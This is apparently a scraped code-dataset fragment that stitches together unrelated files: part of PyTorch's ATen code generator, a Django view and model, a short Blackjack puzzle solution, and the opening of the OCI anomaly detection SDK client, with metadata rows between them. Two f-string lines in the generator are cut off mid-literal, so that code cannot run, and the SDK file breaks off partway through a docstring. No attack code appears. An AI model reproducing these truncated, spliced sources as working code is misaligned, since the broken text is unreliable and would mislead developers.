            'dispatch_registrations': list(concatMap(
                dest.RegisterDispatchKey(
                    backend_index,
                    Target.REGISTRATION,
                    selector,
                    rocm=rocm,
                    cpp_namespace='at::native',
                    class_method_name=None),
                grouped_native_functions
            )),
        })

    # BackendSelect is generated specially
    def gen_backend_select() -> Dict[str, List[str]]:
        relevant_fns = [fn for fn in native_functions if needs_backend_select(fn, selector)]
        return {
            # NOTE(review): truncated f-string literal on the next line.
            'ops_headers': [f'
            'backend_select_method_definitions':
                list(mapMaybe(ComputeBackendSelect(Target.DEFINITION, selector), relevant_fns)),
            'backend_select_function_registrations':
                list(mapMaybe(ComputeBackendSelect(Target.REGISTRATION, selector), relevant_fns)),
        }
    cpu_fm.write('RegisterBackendSelect.cpp', gen_backend_select)

    # With force_schema_registration every schema is registered, even ops
    # filtered out by the custom-build selector.
    schema_selector = selector
    if force_schema_registration:
        schema_selector = SelectiveBuilder.get_nop_selector()
    cpu_fm.write('RegisterSchema.cpp', lambda: {
        'schema_registrations': list(mapMaybe(RegisterSchema(schema_selector), native_functions)),
    })

    def key_func(fn: Union[NativeFunction, NativeFunctionsGroup]) -> str:
        # Shard assignment key: operators with the same root name share a shard.
        return fn.root_name

    cpu_fm.write_sharded(
        'Operators.cpp',
        native_functions,
        key_fn=key_func,
        env_callable=lambda fn: {
            # NOTE(review): truncated f-string literal on the next line.
            'operator_headers': [f'
            'definitions': [ComputeOperators(Target.DEFINITION)(fn)]},
        num_shards=5,
        sharded_keys={'operator_headers', 'definitions'}
    )
    cpu_fm.write('Functions.cpp', lambda: {})
    core_fm.write('TensorMethods.cpp', lambda: {})
    core_fm.write('ATenOpList.cpp', lambda: {
        'aten_ops': list(mapMaybe(compute_aten_op, native_functions)),
    })
    # We need to easily map from [inplace_op_name] -> [functional_op] for the functionalization pass,
    # so here I generate a mapping from every operator name to its corresponding functional NativeFunction (if it exist).
    pre_grouped_d: Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]] = pre_group_native_functions(native_functions)
    to_functional_op: Dict[OperatorName, Optional[NativeFunction]] = {
        k: v for d in [
            {f.func.name: pre_grouped_d[func][SchemaKind.functional]
             if SchemaKind.functional in pre_grouped_d[func].keys() else None
             for f in pre_grouped_d[func].values()}
            for func in pre_grouped_d.keys()]
        for k, v in d.items()
    }

    def functionalization_env_callable(
            g: Union[NativeFunction, NativeFunctionsGroup]
    ) -> Dict[str, List[str]]:
        # Template environment for one group in RegisterFunctionalization.cpp.
        functions = [g] if isinstance(g, NativeFunction) else list(g.functions())
        functions_needing_functionalization = [
            fn for fn in functions if needs_functionalization(selector, fn)]
        return {
            'ops_headers': ([
                f"#include <ATen/ops/{functions[0].root_name}_native.h>",
                f"#include <ATen/ops/{functions[0].root_name}_ops.h>",
            ] if functions_needing_functionalization else []),
            'func_definitions': list(mapMaybe(
                lambda f: gen_functionalization_definition(selector, f, to_functional_op[f.func.name]),
                functions_needing_functionalization)),
            'func_registrations': list(mapMaybe(
                lambda f: gen_functionalization_registration(
                    selector, f, backend_indices[DispatchKey.CompositeImplicitAutograd]),
                functions_needing_functionalization)),
        }

    cpu_fm.write_sharded(
        'RegisterFunctionalization.cpp',
        grouped_native_functions,
        key_fn=key_func,
        env_callable=functionalization_env_callable,
        num_shards=4,
        sharded_keys={'ops_headers', 'func_definitions', 'func_registrations'}
    )
def gen_declarations_yaml(
        cpu_fm: FileManager,
        native_functions: Sequence[NativeFunction]) -> None:
    """Emit Declarations.yaml with one record per native function."""
    def render() -> object:
        entries = [compute_declaration_yaml(fn) for fn in native_functions]
        return format_yaml(entries)

    cpu_fm.write('Declarations.yaml', render)
def main() -> None:
    """CLI entry point: parse options, load native_functions.yaml, and run
    the requested generators (sources / headers / declarations yaml)."""
    parser = argparse.ArgumentParser(description='Generate ATen source files')
    parser.add_argument(
        '-s',
        '--source-path',
        help='path to source directory for ATen',
        default='aten/src/ATen')
    parser.add_argument(
        '-o',
        '--output-dependencies',
        help='output a list of dependencies into the given file and exit')
    parser.add_argument(
        '--dry-run', action='store_true',
        help='run without writing any files (still updates outputs)')
    parser.add_argument(
        '--per-operator-headers', action='store_true',
        help='generate separate headers per operator in ATen/ops')
    parser.add_argument(
        '-d', '--install_dir', help='output directory',
        default='build/aten/src/ATen')
    parser.add_argument(
        '--rocm',
        action='store_true',
        help='reinterpret CUDA as ROCm/HIP and adjust filepaths accordingly')
    # TODO: --op_registration_whitelist will be removed when all call-sites
    # for gen.py are moved over to using the operator YAML file for mobile
    # custom build.
    parser.add_argument(
        '--op_registration_whitelist',
        nargs='*',
        help='filter op registrations by the whitelist (if set); '
             'each item is `namespace`::`operator name` without overload name; '
             'e.g.: aten::empty aten::conv2d ...')
    parser.add_argument(
        '--op_selection_yaml_path',
        help='Provide a path to the operator selection (for custom build) YAML '
             'that contains the information about the set of selected operators '
             'and their categories (training, ...). Each operator is either a '
             'full operator name with overload or just a bare operator name. '
             'The operator names also contain the namespace prefix (e.g. aten::)')
    parser.add_argument(
        '--backend_whitelist',
        nargs='*',
        help='filter dispatch backend by the whitelist (if set), '
             'e.g.: CPU CUDA QuantizedCPU ...')
    parser.add_argument(
        '--static_dispatch_backend',
        help='generate static dispatch code for the specific backend (if set)')
    parser.add_argument(
        '--force_schema_registration',
        action='store_true',
        help='force it to generate schema-only registrations for all ops, including'
             'those that are not listed on --op_registration_whitelist')
    parser.add_argument(
        '--generate',
        type=str,
        nargs='*',
        choices=['headers', 'sources', 'declarations_yaml'],
        default=['headers', 'sources', 'declarations_yaml'],
        help='Generate only a subset of files')
    options = parser.parse_args()
    # Operator selection policy for custom/mobile builds (allowlist XOR yaml).
    selector = get_custom_build_selector(
        options.op_registration_whitelist,
        options.op_selection_yaml_path,
    )
    # Parse the operator registry and group ops into functional/inplace/out sets.
    native_yaml_path = os.path.join(options.source_path, 'native/native_functions.yaml')
    parsed_yaml = parse_native_yaml(native_yaml_path)
    native_functions, backend_indices = parsed_yaml.native_functions, parsed_yaml.backend_indices
    grouped_native_functions = get_grouped_native_functions(native_functions)
    template_dir = os.path.join(options.source_path, "templates")
    # NB: It is mandatory to NOT use os.path.join here, as the install directory
    # will eventually be ingested by cmake, which does not respect Windows style
    # path slashes. If you switch this to use os.path.join, you'll get an error
    core_install_dir = f'{options.install_dir}/core'
    pathlib.Path(core_install_dir).mkdir(parents=True, exist_ok=True)
    ops_install_dir = f'{options.install_dir}/ops'
    pathlib.Path(ops_install_dir).mkdir(parents=True, exist_ok=True)

    def make_file_manager(install_dir: str) -> FileManager:
        # All file managers share the template dir and dry-run flag.
        return FileManager(install_dir=install_dir, template_dir=template_dir, dry_run=options.dry_run)

    # cpu_fm and cuda_fm write into the same directory; they are separate
    # managers so their output lists can be tracked independently below.
    core_fm = make_file_manager(core_install_dir)
    cpu_fm = make_file_manager(options.install_dir)
    cuda_fm = make_file_manager(options.install_dir)
    ops_fm = make_file_manager(ops_install_dir)
    # NOTE(review): extra_cuda_headers is never referenced again in main();
    # gen_source_files builds its own identical copy.  Looks like dead code
    # here — confirm before removing.
    extra_cuda_headers = '''\
#include <c10/cuda/CUDAGuard.h>
#include <ATen/cuda/ATenCUDAGeneral.h>
#include <ATen/cuda/CUDADevice.h>
#include <ATen/cuda/CUDAContext.h>'''
    if options.rocm:
        extra_cuda_headers = '''\
#include <ATen/hip/impl/HIPGuardImplMasqueradingAsCUDA.h>
#include <ATen/hip/ATenHIPGeneral.h>
#include <ATen/hip/HIPDevice.h>
#include <ATen/hip/HIPContext.h>'''
    # Only a limited set of dispatch keys get code-generated files.
    dispatch_keys = [
        DispatchKey.CPU,
        DispatchKey.SparseCPU,
        DispatchKey.SparseCsrCPU,
        DispatchKey.MkldnnCPU,
        DispatchKey.CUDA,
        DispatchKey.SparseCUDA,
        DispatchKey.SparseCsrCUDA,
        DispatchKey.QuantizedCPU,
        DispatchKey.QuantizedCUDA,
        DispatchKey.CompositeImplicitAutograd,
        DispatchKey.CompositeExplicitAutograd,
        DispatchKey.Meta,
        DispatchKey.ZeroTensor,
    ]
    # Keys that additionally get {DispatchKey}Functions.h headers.
    functions_keys = {
        DispatchKey.CPU,
        DispatchKey.CUDA,
        DispatchKey.CompositeImplicitAutograd,
        DispatchKey.CompositeExplicitAutograd,
        DispatchKey.Meta,
    }
    if options.backend_whitelist:
        # Generic keys always survive the whitelist filter.
        dispatch_keys = [k for k in dispatch_keys if is_generic_dispatch_key(k) or str(k) in options.backend_whitelist]
    static_dispatch_idx: Optional[BackendIndex] = None
    if options.static_dispatch_backend:
        static_dispatch_idx = backend_indices[DispatchKey.parse(options.static_dispatch_backend)]
    if 'sources' in options.generate:
        gen_source_files(
            native_functions=native_functions,
            grouped_native_functions=grouped_native_functions,
            static_dispatch_idx=static_dispatch_idx,
            selector=selector,
            backend_indices=backend_indices,
            core_fm=core_fm,
            cpu_fm=cpu_fm,
            cuda_fm=cuda_fm,
            dispatch_keys=dispatch_keys,
            functions_keys=functions_keys,
            rocm=options.rocm,
            force_schema_registration=options.force_schema_registration,
            per_operator_headers=options.per_operator_headers,
        )
    if 'headers' in options.generate:
        gen_headers(
            native_functions=native_functions,
            grouped_native_functions=grouped_native_functions,
            static_dispatch_idx=static_dispatch_idx,
            selector=selector,
            backend_indices=backend_indices,
            core_fm=core_fm,
            cpu_fm=cpu_fm,
            cuda_fm=cuda_fm,
            ops_fm=ops_fm,
            dispatch_keys=dispatch_keys,
            functions_keys=functions_keys,
            rocm=options.rocm,
            per_operator_headers=options.per_operator_headers,
        )
    if 'declarations_yaml' in options.generate:
        gen_declarations_yaml(
            native_functions=native_functions,
            cpu_fm=cpu_fm)
    if options.output_dependencies:
        # Write one dependency list per file manager, each with a prefixed
        # variable name and file name next to the requested depfile.
        depfile_path = pathlib.Path(options.output_dependencies).resolve()
        depfile_name = depfile_path.name
        depfile_stem = depfile_path.stem
        for fm, prefix in [
            (cpu_fm, ""),
            (core_fm, "core_"),
            (cuda_fm, "cuda_"),
            (ops_fm, "ops_"),
        ]:
            varname = prefix + depfile_stem
            path = depfile_path.parent / (prefix + depfile_name)
            fm.write_outputs(varname, str(path))
# Standard script entry point; all CLI handling lives in main().
if __name__ == '__main__':
    main()
| true | true |
1c2c83d541ec61b48477e9434ffd2529d76000e1 | 720 | py | Python | diplomova_praca/shared/views.py | MDobransky/thesis-grizzly | b038b477596879465636eae34444d70742a86e8f | [
"MIT"
] | 1 | 2020-07-28T18:38:19.000Z | 2020-07-28T18:38:19.000Z | diplomova_praca/shared/views.py | JankaSvK/thesis-grizzly | c0e573cd01008003c7d67e093c698ebf2d668f04 | [
"MIT"
] | 1 | 2020-09-21T21:38:46.000Z | 2020-09-21T21:38:46.000Z | diplomova_praca/shared/views.py | MDobransky/thesis-grizzly | b038b477596879465636eae34444d70742a86e8f | [
"MIT"
] | 1 | 2020-08-20T18:52:13.000Z | 2020-08-20T18:52:13.000Z | from pathlib import Path
from typing import Set
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from diplomova_praca_lib.position_similarity.models import PositionMethod
from diplomova_praca_lib.position_similarity.position_similarity_request import available_images
from shared.utils import dir_files
@csrf_exempt
def video_images(request):
    """Return JSON listing all image files in the same directory as the
    POSTed image path ('src')."""
    # 'src' is a site-relative path like '/<dir>/<file>'; src[1:] strips
    # the leading slash before building a filesystem Path.
    src = request.POST.get('src', '')
    print(src)  # NOTE(review): leftover debug print — consider logging or removing
    # Re-prepend '/' so each entry is usable as an img src URL.
    files = [{"img_src": '/' + str(path)} for path in dir_files(Path(src[1:]).parent)]
    return JsonResponse({'files': files}, status=200)
@csrf_exempt
def images_loaded_in_dataset(method:PositionMethod) -> Set[str]:
    # Thin wrapper over the library's available_images().
    # NOTE(review): despite @csrf_exempt this takes a PositionMethod, not an
    # HTTP request, so it does not look like a routable Django view — confirm.
    return available_images(method)
| 31.304348 | 97 | 0.761111 | from pathlib import Path
from typing import Set
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from diplomova_praca_lib.position_similarity.models import PositionMethod
from diplomova_praca_lib.position_similarity.position_similarity_request import available_images
from shared.utils import dir_files
@csrf_exempt
def video_images(request):
src = request.POST.get('src', '')
print(src)
files = [{"img_src": '/' + str(path)} for path in dir_files(Path(src[1:]).parent)]
return JsonResponse({'files': files}, status=200)
@csrf_exempt
def images_loaded_in_dataset(method:PositionMethod) -> Set[str]:
return available_images(method)
| true | true |
1c2c84ba962513758acd36c71af378ec70598821 | 828 | py | Python | paperlims/core/models/experiment_data_file.py | slohr/paperlims | 598899b3a0945d9e7353ba79742bd94798b3e17b | [
"MIT"
] | null | null | null | paperlims/core/models/experiment_data_file.py | slohr/paperlims | 598899b3a0945d9e7353ba79742bd94798b3e17b | [
"MIT"
] | 1 | 2020-06-05T17:32:56.000Z | 2020-06-05T17:32:56.000Z | paperlims/core/models/experiment_data_file.py | slohr/paperlims | 598899b3a0945d9e7353ba79742bd94798b3e17b | [
"MIT"
] | null | null | null | import os.path
from django.db import models
from polymorphic.models import PolymorphicModel
from core.models.base import Base
from core.models.base import UniqueFileSystemStorage
from core import constants
from core.models import Experiment
class ExperimentDataFile(PolymorphicModel,Base):
    """Polymorphic model for a data file attached to an Experiment."""
    # NOTE(review): ForeignKey without on_delete — Django < 2.0 style; confirm
    # the project's Django version before touching this.
    experiment = models.ForeignKey(Experiment)

    class Meta:
        app_label = "core"
        db_table = 'experiment_data_file'
        # Newest first (date_created presumably comes from Base — confirm).
        ordering = ['-date_created']

    def filename(self):
        """Return just the basename of the stored file."""
        return os.path.basename(self.file.name)

    def get_upload_path(instance, filename):
        # upload_to callback: files land under
        # <EXPERIMENT_DATA_FILES>/<experiment id>/<original filename>.
        return os.path.join(
            "{0}/{1}/{2}".format(constants.EXPERIMENT_DATA_FILES,instance.experiment.id,filename)
        )
    file = models.FileField(upload_to=get_upload_path,storage=UniqueFileSystemStorage())

    def __str__(self):
        return self.filename()
| 25.090909 | 91 | 0.754831 | import os.path
from django.db import models
from polymorphic.models import PolymorphicModel
from core.models.base import Base
from core.models.base import UniqueFileSystemStorage
from core import constants
from core.models import Experiment
class ExperimentDataFile(PolymorphicModel,Base):
    """A data file attached to an :class:`Experiment`.

    Polymorphic (django-polymorphic) so subclasses can specialise
    per-file-type behaviour while sharing this table and queryset.
    """
    # Owning experiment. NOTE(review): no ``on_delete`` argument, which
    # implies Django < 2.0 (where it defaulted to CASCADE) — confirm the
    # project's Django version before upgrading.
    experiment = models.ForeignKey(Experiment)
    class Meta:
        app_label = "core"
        db_table = 'experiment_data_file'
        ordering = ['-date_created']  # newest files first
    def filename(self):
        """Return the file's base name, stripped of its storage path."""
        return os.path.basename(self.file.name)
    def get_upload_path(instance, filename):
        # ``upload_to`` callback: files are stored under
        # <EXPERIMENT_DATA_FILES>/<experiment id>/<original filename>.
        # Deliberately declared as (instance, filename) — Django invokes
        # it as a plain function, not as a bound method.
        return os.path.join(
            "{0}/{1}/{2}".format(constants.EXPERIMENT_DATA_FILES,instance.experiment.id,filename)
        )
    # Storage deduplicates identical files (see UniqueFileSystemStorage).
    file = models.FileField(upload_to=get_upload_path,storage=UniqueFileSystemStorage())
    def __str__(self):
        return self.filename()
| true | true |
1c2c85d149efb259a9d59cc01ff04e725439b7a9 | 286 | py | Python | BAEKJOON/Python/2798.py | cmsong111/NJ_code | 2df6176d179e168a2789a825ddeb977a82eb8d97 | [
"MIT"
] | null | null | null | BAEKJOON/Python/2798.py | cmsong111/NJ_code | 2df6176d179e168a2789a825ddeb977a82eb8d97 | [
"MIT"
] | null | null | null | BAEKJOON/Python/2798.py | cmsong111/NJ_code | 2df6176d179e168a2789a825ddeb977a82eb8d97 | [
"MIT"
] | null | null | null | import itertools
# BOJ 2798 (Blackjack): pick 3 cards whose sum is as large as possible
# without exceeding the limit M.
import itertools


def best_blackjack_sum(cards, limit):
    """Return the largest sum of any 3 distinct cards not exceeding *limit*.

    Uses ``itertools.combinations`` rather than ``permutations``: a triple's
    sum is order-independent, so the original permutations version evaluated
    every triple 6 times and materialized a full list of sums for no benefit.
    The problem guarantees at least one valid triple exists.
    """
    return max(
        total
        for total in (sum(pick) for pick in itertools.combinations(cards, 3))
        if total <= limit
    )


if __name__ == "__main__":
    # Input: first line "N M"; second line the N card values.
    _n, limit = map(int, input().split())
    cards = list(map(int, input().split()))
    print(best_blackjack_sum(cards, limit))
| 15.888889 | 42 | 0.632867 | import itertools
# BOJ 2798 (Blackjack): pick 3 cards whose sum is as large as possible
# without exceeding b. NOTE(review): relies on an earlier
# ``import itertools`` in this file.
a,b = map(int,input().split())  # a = number of cards (unused), b = limit
lis = list(map(int,input().split()))  # the card values
# All ordered triples — each unordered triple therefore appears 6 times.
num = list(itertools.permutations(lis, 3))
final_list = []
# Collect every triple-sum that stays within the limit.
for i in range(len(num)):
    if sum(num[i]) <= b:
        final_list.append(sum(num[i]))
print(max(final_list))  # best achievable sum
| true | true |
1c2c86346e240ca3d1809f76577a678fc96c78c5 | 142,252 | py | Python | src/oci/ai_anomaly_detection/anomaly_detection_client.py | CentroidChef/oci-python-sdk | fa406e27a52b40c70e220c20f52dfe2abe6236a3 | [
"Apache-2.0",
"BSD-3-Clause"
] | 249 | 2017-09-11T22:06:05.000Z | 2022-03-04T17:09:29.000Z | src/oci/ai_anomaly_detection/anomaly_detection_client.py | CentroidChef/oci-python-sdk | fa406e27a52b40c70e220c20f52dfe2abe6236a3 | [
"Apache-2.0",
"BSD-3-Clause"
] | 228 | 2017-09-11T23:07:26.000Z | 2022-03-23T10:58:50.000Z | src/oci/ai_anomaly_detection/anomaly_detection_client.py | CentroidChef/oci-python-sdk | fa406e27a52b40c70e220c20f52dfe2abe6236a3 | [
"Apache-2.0",
"BSD-3-Clause"
] | 224 | 2017-09-27T07:32:43.000Z | 2022-03-25T16:55:42.000Z | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from oci._vendor import requests # noqa: F401
from oci._vendor import six
from oci import retry, circuit_breaker # noqa: F401
from oci.base_client import BaseClient
from oci.config import get_config_value_or_default, validate_config
from oci.signer import Signer
from oci.util import Sentinel, get_signer_from_authentication_type, AUTHENTICATION_TYPE_FIELD_NAME
from .models import ai_anomaly_detection_type_mapping
# Sentinel marking "value not provided", so optional parameters/headers
# that were omitted can be distinguished from an explicit None.
missing = Sentinel("Missing")
class AnomalyDetectionClient(object):
"""
OCI AI Service solutions can help Enterprise customers integrate AI into their products immediately by using our proven,
pre-trained/custom models or containers, and without a need to set up in house team of AI and ML experts.
This allows enterprises to focus on business drivers and development work rather than AI/ML operations, shortening the time to market.
"""
def __init__(self, config, **kwargs):
"""
Creates a new service client
:param dict config:
Configuration keys and values as per `SDK and Tool Configuration <https://docs.cloud.oracle.com/Content/API/Concepts/sdkconfig.htm>`__.
The :py:meth:`~oci.config.from_file` method can be used to load configuration from a file. Alternatively, a ``dict`` can be passed. You can validate_config
the dict using :py:meth:`~oci.config.validate_config`
:param str service_endpoint: (optional)
The endpoint of the service to call using this client. For example ``https://iaas.us-ashburn-1.oraclecloud.com``. If this keyword argument is
not provided then it will be derived using the region in the config parameter. You should only provide this keyword argument if you have an explicit
need to specify a service endpoint.
:param timeout: (optional)
The connection and read timeouts for the client. The default values are connection timeout 10 seconds and read timeout 60 seconds. This keyword argument can be provided
as a single float, in which case the value provided is used for both the read and connection timeouts, or as a tuple of two floats. If
a tuple is provided then the first value is used as the connection timeout and the second value as the read timeout.
:type timeout: float or tuple(float, float)
:param signer: (optional)
The signer to use when signing requests made by the service client. The default is to use a :py:class:`~oci.signer.Signer` based on the values
provided in the config parameter.
One use case for this parameter is for `Instance Principals authentication <https://docs.cloud.oracle.com/Content/Identity/Tasks/callingservicesfrominstances.htm>`__
by passing an instance of :py:class:`~oci.auth.signers.InstancePrincipalsSecurityTokenSigner` as the value for this keyword argument
:type signer: :py:class:`~oci.signer.AbstractBaseSigner`
:param obj retry_strategy: (optional)
A retry strategy to apply to all calls made by this service client (i.e. at the client level). There is no retry strategy applied by default.
Retry strategies can also be applied at the operation level by passing a ``retry_strategy`` keyword argument as part of calling the operation.
Any value provided at the operation level will override whatever is specified at the client level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
:param obj circuit_breaker_strategy: (optional)
A circuit breaker strategy to apply to all calls made by this service client (i.e. at the client level).
This client will not have circuit breakers enabled by default, users can use their own circuit breaker strategy or the convenient :py:data:`~oci.circuit_breaker.DEFAULT_CIRCUIT_BREAKER_STRATEGY` provided by the SDK to enable it.
The specifics of circuit breaker strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/circuit_breakers.html>`__.
:param function circuit_breaker_callback: (optional)
Callback function to receive any exceptions triggerred by the circuit breaker.
"""
validate_config(config, signer=kwargs.get('signer'))
if 'signer' in kwargs:
signer = kwargs['signer']
elif AUTHENTICATION_TYPE_FIELD_NAME in config:
signer = get_signer_from_authentication_type(config)
else:
signer = Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
base_client_init_kwargs = {
'regional_client': True,
'service_endpoint': kwargs.get('service_endpoint'),
'base_path': '/20210101',
'service_endpoint_template': 'https://anomalydetection.aiservice.{region}.oci.{secondLevelDomain}',
'skip_deserialization': kwargs.get('skip_deserialization', False),
'circuit_breaker_strategy': kwargs.get('circuit_breaker_strategy', circuit_breaker.GLOBAL_CIRCUIT_BREAKER_STRATEGY)
}
if 'timeout' in kwargs:
base_client_init_kwargs['timeout'] = kwargs.get('timeout')
self.base_client = BaseClient("anomaly_detection", config, signer, ai_anomaly_detection_type_mapping, **base_client_init_kwargs)
self.retry_strategy = kwargs.get('retry_strategy')
self.circuit_breaker_callback = kwargs.get('circuit_breaker_callback')
def cancel_work_request(self, work_request_id, **kwargs):
"""
Cancel work request with the given ID.
:param str work_request_id: (required)
The ID of the asynchronous request.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/cancel_work_request.py.html>`__ to see an example of how to use cancel_work_request API.
"""
resource_path = "/workRequests/{workRequestId}"
method = "DELETE"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"cancel_work_request got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workRequestId": work_request_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params)
def change_ai_private_endpoint_compartment(self, ai_private_endpoint_id, change_ai_private_endpoint_compartment_details, **kwargs):
"""
Moves a resource into a different compartment. When provided, 'If-Match' is checked against 'ETag' values of the resource.
:param str ai_private_endpoint_id: (required)
Unique private reverse connection identifier.
:param oci.ai_anomaly_detection.models.ChangeAiPrivateEndpointCompartmentDetails change_ai_private_endpoint_compartment_details: (required)
Details for the target compartment.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type None
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/aianomalydetection/change_ai_private_endpoint_compartment.py.html>`__ to see an example of how to use change_ai_private_endpoint_compartment API.
"""
resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}/actions/changeCompartment"
method = "POST"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id",
"opc_retry_token"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"change_ai_private_endpoint_compartment got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"aiPrivateEndpointId": ai_private_endpoint_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing),
"opc-retry-token": kwargs.get("opc_retry_token", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_retry_token_if_needed(header_params)
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_ai_private_endpoint_compartment_details)
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=change_ai_private_endpoint_compartment_details)
def change_data_asset_compartment(self, data_asset_id, change_data_asset_compartment_details, **kwargs):
"""
Changing the compartment of a data asset.
:param str data_asset_id: (required)
The OCID of the Data Asset.
:param oci.ai_anomaly_detection.models.ChangeDataAssetCompartmentDetails change_data_asset_compartment_details: (required)
The information to be updated.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call
for a resource, set the `if-match` parameter to the value of the
etag from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the etag you
provide matches the resource's current etag value.
:param str opc_request_id: (optional)
The client request ID for tracing.
:param str opc_retry_token: (optional)
A token that uniquely identifies a request so it can be retried in case of a timeout or
server error without risk of executing that same action again. Retry tokens expire after 24
hours, but can be invalidated before then due to conflicting operations. For example, if a resource
has been deleted and purged from the system, then a retry of the original creation request
might be rejected.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.ai_anomaly_detection.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
